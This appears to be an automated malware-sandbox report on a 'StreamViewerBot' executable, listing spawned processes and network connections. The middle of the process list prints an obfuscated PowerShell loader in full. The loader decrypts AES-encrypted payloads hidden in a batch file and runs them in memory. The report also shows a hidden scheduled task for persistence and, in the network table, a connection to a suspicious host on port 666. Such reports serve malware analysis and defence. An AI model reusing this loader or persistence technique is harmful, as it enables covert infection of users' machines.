"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5700 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5992 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3936 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5064 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:2
C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe
"C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\New folder\it\x64.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('A8iFgIiE17M/9M+aFV4Edi/eXGKyPq9pU4lTC1/qxJk='); $aes_var.IV=[System.Convert]::FromBase64String('5bOKYfyfw/VmAfo64VNDgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xYBLR=New-Object System.IO.MemoryStream(,$param_var); $CLdbP=New-Object System.IO.MemoryStream; $BTxDq=New-Object System.IO.Compression.GZipStream($xYBLR, [IO.Compression.CompressionMode]::Decompress); $BTxDq.CopyTo($CLdbP); $BTxDq.Dispose(); $xYBLR.Dispose(); $CLdbP.Dispose(); $CLdbP.ToArray();}function execute_function($param_var,$param2_var){ $RZWgw=[System.Reflection.Assembly]::Load([byte[]]$param_var); $qKXCW=$RZWgw.EntryPoint; $qKXCW.Invoke($null, $param2_var);}$jMOVt = 'C:\Users\Admin\Desktop\New folder\it\x64.bat';$host.UI.RawUI.WindowTitle = $jMOVt;$TeqNc=[System.IO.File]::ReadAllText($jMOVt).Split([Environment]::NewLine);foreach ($CREjk in $TeqNc) { if ($CREjk.StartsWith('oItXkWqKiQezhOyZZOCD')) { $tNOkm=$CREjk.Substring(20); break; }}$payloads_var=[string[]]$tNOkm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_329_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('A8iFgIiE17M/9M+aFV4Edi/eXGKyPq9pU4lTC1/qxJk='); $aes_var.IV=[System.Convert]::FromBase64String('5bOKYfyfw/VmAfo64VNDgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xYBLR=New-Object System.IO.MemoryStream(,$param_var); $CLdbP=New-Object System.IO.MemoryStream; $BTxDq=New-Object System.IO.Compression.GZipStream($xYBLR, [IO.Compression.CompressionMode]::Decompress); $BTxDq.CopyTo($CLdbP); $BTxDq.Dispose(); $xYBLR.Dispose(); $CLdbP.Dispose(); $CLdbP.ToArray();}function execute_function($param_var,$param2_var){ $RZWgw=[System.Reflection.Assembly]::Load([byte[]]$param_var); $qKXCW=$RZWgw.EntryPoint; $qKXCW.Invoke($null, $param2_var);}$jMOVt = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat';$host.UI.RawUI.WindowTitle = $jMOVt;$TeqNc=[System.IO.File]::ReadAllText($jMOVt).Split([Environment]::NewLine);foreach ($CREjk in $TeqNc) { if ($CREjk.StartsWith('oItXkWqKiQezhOyZZOCD')) { $tNOkm=$CREjk.Substring(20); break; }}$payloads_var=[string[]]$tNOkm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Users\Admin\Desktop\New folder\svb.exe
"C:\Users\Admin\Desktop\New folder\svb.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\CMD.exe
"CMD.exe" /C explorer "https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Windows\explorer.exe
explorer "https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff9fab3cb8,0x7fff9fab3cc8,0x7fff9fab3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6544 /prefetch:2
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\CMD.exe
"CMD.exe" /C taskkill /F /PID 5112
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5112
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa399e055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.13.149:443 | sourceforge.net | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | tcp |
| US | 104.18.17.56:443 | a.fsdn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| GB | 195.181.164.20:443 | cdn.consentmanager.net | tcp |
| US | 104.18.5.227:443 | c.sf-syn.com | tcp |
| US | 8.8.8.8:53 | 56.17.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.13.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.98.230.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.5.18.104.in-addr.arpa | udp |
| FR | 142.250.74.234:443 | content-autofill.googleapis.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| FR | 142.250.74.234:443 | content-autofill.googleapis.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.18.13.149:443 | sourceforge.net | udp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| FR | 142.250.201.162:443 | securepubads.g.doubleclick.net | tcp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| FR | 142.250.201.162:443 | securepubads.g.doubleclick.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| IE | 52.214.218.223:443 | dpm.demdex.net | tcp |
| IE | 63.33.74.9:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 9.38.105.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.218.214.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.74.33.63.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| FR | 216.58.214.161:443 | 2cd4bacf3e9d8c1940f024ffc84214b1.safeframe.googlesyndication.com | tcp |
| FR | 142.250.179.97:443 | tpc.googlesyndication.com | tcp |
| FR | 142.250.179.97:443 | tpc.googlesyndication.com | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| FR | 142.250.201.162:443 | securepubads.g.doubleclick.net | udp |
| US | 104.18.17.56:443 | a.fsdn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| FR | 142.250.74.234:443 | content-autofill.googleapis.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 151.101.1.44:443 | trc.taboola.com | tcp |
| NL | 185.89.211.116:443 | ib.adnxs.com | tcp |
| BE | 23.55.96.210:443 | tags.bluekai.com | tcp |
| IE | 34.254.143.3:443 | loadus.exelator.com | tcp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| DE | 148.251.120.111:443 | kumisystems.dl.sourceforge.net | tcp |
| FR | 142.250.178.142:443 | apis.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| ES | 185.221.85.8:443 | log-api.eu.newrelic.com | tcp |
| US | 188.114.96.2:443 | license.streamviewerbot.com | tcp |
| US | 188.114.96.2:443 | license.streamviewerbot.com | tcp |
| ES | 185.221.85.8:443 | log-api.eu.newrelic.com | tcp |
| DE | 144.76.71.93:666 | wego666.webredirect.org | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| IE | 34.249.200.254:443 | www.webshare.io | tcp |
| IE | 34.249.200.254:443 | www.webshare.io | tcp |
| NL | 23.63.101.170:80 | apps.identrust.com | tcp |
| FR | 142.250.75.234:443 | ajax.googleapis.com | tcp |
| FR | 52.84.174.27:443 | assets-global.website-files.com | tcp |
| FR | 142.250.75.234:443 | ajax.googleapis.com | tcp |
| FR | 52.222.153.158:443 | d3e54v103j8qbb.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 234.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.201.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | widget.trustpilot.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | uploads-ssl.webflow.com | udp |
| FR | 142.250.178.142:443 | apis.google.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| FR | 52.222.201.64:443 | uploads-ssl.webflow.com | tcp |
| FR | 3.162.38.62:443 | widget.trustpilot.com | tcp |
| FR | 142.250.178.142:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | app.posthog.com | udp |
| US | 8.8.8.8:53 | cdn-4.convertexperiments.com | udp |
| US | 172.67.40.50:443 | app.posthog.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| BE | 104.68.71.114:443 | cdn-4.convertexperiments.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 172.67.40.50:443 | app.posthog.com | tcp |
| BE | 104.68.71.114:443 | cdn-4.convertexperiments.com | tcp |
| US | 8.8.8.8:53 | 158.153.222.52.in-addr.arpa | udp |
